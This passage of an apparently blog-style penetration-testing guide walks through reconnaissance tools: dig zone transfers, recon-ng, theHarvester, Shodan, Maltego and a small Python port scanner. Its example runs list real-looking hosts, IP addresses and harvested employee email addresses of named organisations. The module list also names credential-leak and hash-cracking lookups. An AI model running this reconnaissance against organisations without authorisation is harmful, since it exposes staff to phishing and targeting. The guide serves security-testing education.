 +bufsize=### (Set EDNS0 Max UDP packet size)
 +ndots=### (Set NDOTS value)
 +[no]edns[=###] (Set EDNS version) [0]
 +[no]search (Set whether to use searchlist)
 +[no]showsearch (Search with intermediate results)
 +[no]defname (Ditto)
 +[no]recurse (Recursive mode)
 +[no]ignore (Don't revert to TCP for TC responses.)
 +[no]fail (Don't try next server on SERVFAIL)
 +[no]besteffort (Try to parse even illegal messages)
 +[no]aaonly (Set AA flag in query (+[no]aaflag))
 +[no]adflag (Set AD flag in query)
 +[no]cdflag (Set CD flag in query)
 +[no]cl (Control display of class in records)
 +[no]cmd (Control display of command line)
 +[no]comments (Control display of comment lines)
 +[no]rrcomments (Control display of per-record comments)
 +[no]question (Control display of question)
 +[no]answer (Control display of answer)
 +[no]authority (Control display of authority)
 +[no]additional (Control display of additional)
 +[no]stats (Control display of statistics)
 +[no]short (Disable everything except short
 form of answer)
 +[no]ttlid (Control display of ttls in records)
 +[no]all (Set or clear all display flags)
 +[no]qr (Print question before sending)
 +[no]nssearch (Search all authoritative nameservers)
 +[no]identify (ID responders in short answers)
 +[no]trace (Trace delegation down from root [+dnssec])
 +[no]dnssec (Request DNSSEC records)
 +[no]nsid (Request Name Server ID)
 +[no]sigchase (Chase DNSSEC signatures)
 +trusted-key=#### (Trusted Key when chasing DNSSEC sigs)
 +[no]topdown (Do DNSSEC validation top down mode)
 +[no]split=## (Split hex/base64 fields into chunks)
 +[no]multiline (Print records in an expanded format)
 +[no]onesoa (AXFR prints only one soa record)
 +[no]keepopen (Keep the TCP socket open between queries)
 global d-opts and servers (before host name) affect all queries.
 local d-opts and servers (after host name) affect only that lookup.
 -h (print help and exit)
 -v (print version and exit)

My favorite dig option is axfr, for a zone transfer. Zone transfers are a DNS transaction used to replicate records between DNS servers. It’s rare to find a DNS server these days that allow a zone transfer, but it’s something you should check. If you succeed in performing a zone transfer, you will have all dns records for a domain.

Example: dig axfr @dns-server domain.name

Recon-ng

https://bitbucket.org/LaNMaSteR53/recon-ng

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Usage Guide for more information.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class. The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for more information.

If you know how to use Metasploit, you should feel right at home using recon-ng. You can even automate recon-ng using resource files like you can with Metasploit.

Some of the modules are passive, they never touch the target network, while some directly probe and can even attack the system you are targeting.

To install recon-ng in Kali, enter the command:

apt-get update && apt-get install recon-ng

At each level in recon-ng you can get help by typing the help and show commands.

[recon-ng][default] > help

Commands (type [help|?] <topic>):
---------------------------------
add Adds records to the database
back Exits the current context
delete Deletes records from the database
exit Exits the framework
help Displays this menu
keys Manages framework API keys
load Loads specified module
pdb Starts a Python Debugger session
query Queries the database
record Records commands to a resource file
reload Reloads all modules
resource Executes commands from a resource file
search Searches available modules
set Sets module options
shell Executes shell commands
show Shows various framework items
snapshots Manages workspace snapshots
spool Spools output to a file
unset Unsets module options
use Loads specified module
workspaces Manages workspaces

[recon-ng][default] > show
Shows various framework items

Usage: show [banner|companies|contacts|credentials|dashboard|domains|hosts|keys|leaks|locations|modules|netblocks|options|ports|profiles|pushpins|repositories|schema|vulnerabilities|workspaces]

Recon-ng uses the concept of workspaces to organize targets. To add a workspace, use “workspaces add <workspaceName>”. The prompt will change from “default” to display the current workspace.

[recon-ng][default] > workspaces add demo

In the new workspace, add a company and domain:

[recon-ng][demo] > add companies
company (TEXT): SANS
description (TEXT): SANS
[recon-ng][demo] > add domains
domain (TEXT): sans.org

Full list of modules:

[recon-ng][default] > show modules

 Discovery
 ---------
 discovery/info_disclosure/cache_snoop
 discovery/info_disclosure/interesting_files

 Exploitation
 ------------
 exploitation/injection/command_injector
 exploitation/injection/xpath_bruter

 Import
 ------
 import/csv_file
 import/list

 Recon
 -----
 recon/companies-contacts/bing_linkedin_cache
 recon/companies-contacts/indeed
 recon/companies-contacts/jigsaw/point_usage
 recon/companies-contacts/jigsaw/purchase_contact
 recon/companies-contacts/jigsaw/search_contacts
 recon/companies-contacts/linkedin_auth
 recon/companies-multi/github_miner
 recon/companies-multi/whois_miner
 recon/contacts-contacts/mailtester
 recon/contacts-contacts/mangle
 recon/contacts-contacts/unmangle
 recon/contacts-credentials/hibp_breach
 recon/contacts-credentials/hibp_paste
 recon/contacts-domains/migrate_contacts
 recon/contacts-profiles/fullcontact
 recon/credentials-credentials/adobe
 recon/credentials-credentials/bozocrack
 recon/credentials-credentials/hashes_org
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts
 recon/hosts-hosts/bing_ip
 recon/hosts-hosts/freegeoip
 recon/hosts-hosts/ipinfodb
 recon/hosts-hosts/resolve
 recon/hosts-hosts/reverse_resolve
 recon/hosts-hosts/ssltools
 recon/hosts-locations/migrate_hosts
 recon/hosts-ports/shodan_ip
 recon/locations-locations/geocode
 recon/locations-locations/reverse_geocode
 recon/locations-pushpins/flickr
 recon/locations-pushpins/instagram
 recon/locations-pushpins/picasa
 recon/locations-pushpins/shodan
 recon/locations-pushpins/twitter
 recon/locations-pushpins/youtube
 recon/netblocks-companies/whois_orgs
 recon/netblocks-hosts/reverse_resolve
 recon/netblocks-hosts/shodan_net
 recon/netblocks-ports/census_2012
 recon/netblocks-ports/censysio
 recon/ports-hosts/migrate_ports
 recon/profiles-contacts/dev_diver
 recon/profiles-contacts/github_users
 recon/profiles-profiles/namechk
 recon/profiles-profiles/profiler
 recon/profiles-profiles/twitter_mentioned
 recon/profiles-profiles/twitter_mentions
 recon/profiles-repositories/github_repos
 recon/repositories-profiles/github_commits
 recon/repositories-vulnerabilities/gists_search
 recon/repositories-vulnerabilities/github_dorks

 Reporting
 ---------
 reporting/csv
 reporting/html
 reporting/json
 reporting/list
 reporting/pushpin
 reporting/xlsx
 reporting/xml

Striker Security has published an excellent guide to recon-ng modules. Get it here: https://strikersecurity.com/pdfs/recon-ng-guide.pdf

Instead of viewing the full list of modules, you can search for them.

[recon-ng][demo] > search domains
[*] Searching for 'domains'...

 Recon
 -----
 recon/contacts-domains/migrate_contacts
 recon/domains-contacts/metacrawler
 recon/domains-contacts/pgp_search
 recon/domains-contacts/whois_pocs
 recon/domains-credentials/pwnedlist/account_creds
 recon/domains-credentials/pwnedlist/api_usage
 recon/domains-credentials/pwnedlist/domain_creds
 recon/domains-credentials/pwnedlist/domain_ispwned
 recon/domains-credentials/pwnedlist/leak_lookup
 recon/domains-credentials/pwnedlist/leaks_dump
 recon/domains-domains/brute_suffix
 recon/domains-hosts/bing_domain_api
 recon/domains-hosts/bing_domain_web
 recon/domains-hosts/brute_hosts
 recon/domains-hosts/builtwith
 recon/domains-hosts/certificate_transparency
 recon/domains-hosts/google_site_api
 recon/domains-hosts/google_site_web
 recon/domains-hosts/hackertarget
 recon/domains-hosts/netcraft
 recon/domains-hosts/shodan_hostname
 recon/domains-hosts/ssl_san
 recon/domains-hosts/threatcrowd
 recon/domains-hosts/vpnhunter
 recon/domains-vulnerabilities/ghdb
 recon/domains-vulnerabilities/punkspider
 recon/domains-vulnerabilities/xssed
 recon/domains-vulnerabilities/xssposed
 recon/hosts-domains/migrate_hosts

To use a module, enter “use <full path to module>”. Recon-ng offers tab completion, so you can type a partial path and hit the tab key to complete each section of the path between slashes. Once you’ve entered a module, use “show info” to find module info and required parameters.

[recon-ng][demo][shodan_hostname] > use recon/domains-hosts/bing_domain_web
[recon-ng][demo][bing_domain_web] > show info

 Name: Bing Hostname Enumerator
 Path: modules/recon/domains-hosts/bing_domain_web.py
 Author: Tim Tomes (@LaNMaSteR53)

Description:
 Harvests hosts from Bing.com by using the 'site' search operator. Updates the 'hosts' table with the
 results.

Options:
 Name Current Value Required Description
 ------ ------------- -------- -----------
 SOURCE default yes source of input (see 'show info' for details)

Source Options:
 default SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
 <string> string representing a single input
 <path> path to a file containing a list of inputs
 query <sql> database query returning one column of inputs

[recon-ng][demo][bing_domain_web] >

To start the module, enter “run”.

[recon-ng][demo][bing_domain_web] > run

--------
SANS.ORG
--------
[*] URL: https://www.bing.com/search?first=0&q=domain%3Asans.org
[*] [host] files.sans.org (<blank>)
[*] [host] labs.sans.org (<blank>)
[*] [host] www.sans.org (<blank>)
[*] [host] cyber-defense.sans.org (<blank>)
[*] [host] redmine.sans.org (<blank>)
[*] [host] securingthehuman.sans.org (<blank>)
[*] [host] software-security.sans.org (<blank>)
[*] [host] lists.sans.org (<blank>)
[*] [host] access.sans.org (<blank>)
[*] [host] digital-forensics.sans.org (<blank>)
[*] [host] sic.sans.org (<blank>)
[*] [host] uk.sans.org (<blank>)
[*] [host] ics.sans.org (<blank>)
[*] [host] pen-testing.sans.org (<blank>)
[*] [host] qms.sans.org (<blank>)
[*] [host] handlers.sans.org (<blank>)
[*] Sleeping to avoid lockout...

Now lets check out any new hosts added to the database.

[recon-ng][demo][bing_domain_web] > show hosts

 +---------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +---------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
 | 5 | redmine.sans.org | | | | | | bing_domain_web |
 | 6 | securingthehuman.sans.org | | | | | | bing_domain_web |
 | 7 | software-security.sans.org | | | | | | bing_domain_web |
 | 8 | lists.sans.org | | | | | | bing_domain_web |

(cropped for brevity)

Let’s try a different module then take another look at the hosts.

[recon-ng][demo][bing_domain_web] > search shodan
[*] Searching for 'shodan'...

 Recon
 -----
 recon/domains-hosts/shodan_hostname
 recon/hosts-ports/shodan_ip
 recon/locations-pushpins/shodan
 recon/netblocks-hosts/shodan_net

[recon-ng][demo][bing_domain_web] > use recon/domains-hosts/shodan_hostname
[recon-ng][demo][shodan_hostname] > run

--------
SANS.ORG
--------
[*] Searching Shodan API for: hostname:sans.org
[*] [port] 204.51.94.14 (25/<blank>) - smtp31b.sans.org
[*] [host] smtp31b.sans.org (204.51.94.14)
[*] [port] 66.35.59.19 (80/<blank>) - web23a.den.sans.org
[*] [host] web23a.den.sans.org (66.35.59.19)
[*] [port] 66.35.59.8 (53/<blank>) - dns21b.sans.org
[*] [host] dns21b.sans.org (66.35.59.8)
(cropped for brevity)

[recon-ng][demo][shodan_hostname] > show hosts

 +--------------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +--------------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
(cropped for brevity)
   42 | smtp31b.sans.org | 204.51.94.14 | | | | | shodan_hostname |
 | 43 | web23a.den.sans.org | 66.35.59.19 | | | | | shodan_hostname |
 | 44 | dns21b.sans.org | 66.35.59.8 | | | | | shodan_hostname |
 | 45 | admin.sans.org | 204.51.94.215 | | | | | shodan_hostname |
 | 46 | 204-51-94-246.clp.sans.org | 204.51.94.246 | | | | | shodan_hostname |
 | 47 | labs.sans.org | 204.51.94.233 | | | | | shodan_hostname |


Theharvester

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization. Source: https://code.google.com/p/theharvester/

┌─[kali]─[~]
└──> theharvester -d chkd.org -b all -e chsext1.chkd.org

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.7 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************


Full harvest..
[-] Searching in Google..
 Searching 0 results...
 Searching 100 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
 Searching 50 results...
 Searching 100 results...
[-] Searching in Exalead..
 Searching 50 results...
 Searching 100 results...
 Searching 150 results...


[+] Emails found:
------------------
+john.harrington@chkd.org
ASampson@chkd.org
Amy.Sampson@chkd.org
Amy@chkd.org
Barbara.Benson@chkd.org
Beach@chkd.org
Beverly.Jacobson@chkd.org
(cropped for brevity)
[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs... 
92.242.140.21:2Fwww.chkd.org
208.255.163.169:apihrp.chkd.org
157.21.35.200:kdmedia.chkd.org
208.255.163.168:mekids.chkd.org
208.255.163.189:webmail.chkd.org
208.255.163.163:www.chkd.org
[+] Virtual hosts:
==================
208.255.163.169 apihrp.chkd.org
157.21.35.200 kdmedia.chkd.org
208.255.163.189 webmail.chkd.org
208.255.163.163 www.chkd.org
208.255.163.163 208.255.163.163

Network-tools.com

This site offers a number of web-based tools, including:

Express
Ping
Trace
Whois (IDN Conversion Tool)
DNS Records (Advanced Tool)
Network Lookup
Spam Blacklist Check
URL Decode
URL Encode
HTTP Headers SSL
Email Tests

One of the tools I find useful on this site is the Network Lookup. Enter an IP address or domain name and it will show the network address/range which is useful for finding IP address ranges owned by the target to include in active scans. This is the output of checking “Network Lookup” on www.sans.org.

NetRange: 66.35.59.0 - 66.35.59.255
CIDR: 66.35.59.0/24

Netcraft Toolbar

http://toolbar.netcraft.com/site_report

This site is useful to see what technology a website is running.

SiteDigger

http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

SiteDigger 3.0 searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.

sitedigger

Shodan.io

https://www.shodan.io/

The search engine for the Internet of Things

Think of Shodan as a search engine that returns results that include the banner of a site or device. Want to find open vulnerable sites, VNC servers, IoT devices, webcams that don’t require authentication and allow you to waste hours of your day? You can also use shodan to generate a list of target IP addresses, export the list, and import into your security tool of choice.

You can find a free guide to Shodan on exploit-db.com:  https://www.exploit-db.com/docs/33859.pdf

Maltego

Maltego Community Edition is pre-installed in Kali Linux.

Maltego is an interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet. Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis.

Currently there are three versions of the Maltego client namely Maltego CE, Maltego Classic and Maltego XL. This page will focus on Maltego Community Edition (CE). All three Maltego clients come with access to a library of standard transforms for the discovery of data from a wide range of public sources that are commonly used in online investigations and digital forensics.

Port scan and grab banners in Python

Just a simple port scanner and banner grabber written in Python. I made it because I didn’t have admin privs to install nmap at the time because I was a new employee < 90 days and I wanted to sharpen my Python skills and find out if that port was open.

The instructions are simple. Just run “python simpleportscanner.py” and it will prompt for an IP address. It scans for specific tcp ports as is. Edit the code to scan the ports you desire or enter ports on the cli.

#!/usr/bin/env python
import socket
from multiprocessing.dummy import Pool as ThreadPool
import sys
from datetime import datetime

# Clear the screen
# subprocess.call('cls', shell=True)

# Ask for input
remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)

# Print a nice banner with information on which host we are about to scan
print "-" * 60
print "Please wait, scanning remote host", remoteServerIP
print "-" * 60

# Check what time the scan started
t1 = datetime.now()

def scan(ports):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    result = sock.connect_ex((remoteServerIP, ports))
    if result == 0:
        byte = str.encode("Server:\r\n")
        sock.send(byte)
        banner = sock.recv(1024)
        print "Port {}: Open".format(ports), " - ", banner
    sock.close()

# function to be mapped over
def scanParallel(ports, threads=4):
    pool = ThreadPool(threads)
    results = pool.map(scan, ports)
    pool.close()
    pool.join()
    return results

if __name__ == "__main__":
    ports =(20,21,22,23,53,69,80,88,110,123,135,137,138,139,143,161,389,443,445,464,512,513,631,860,1080,1433,1434,3124,3128,3306,3389,5800,5900,8080,10000)
    results = scanParallel(ports, 4)

   # Checking the time again
   t2 = datetime.now()

   # Calculates the difference of time, to see how long it took to run the  script
   total = t2 - t1

   # Printing the information to screen
   print 'Scanning Completed in: ', total

Get the code: https://raw.githubusercontent.com/sdcampbell/simpleportscanner/master/simpleportscanner.py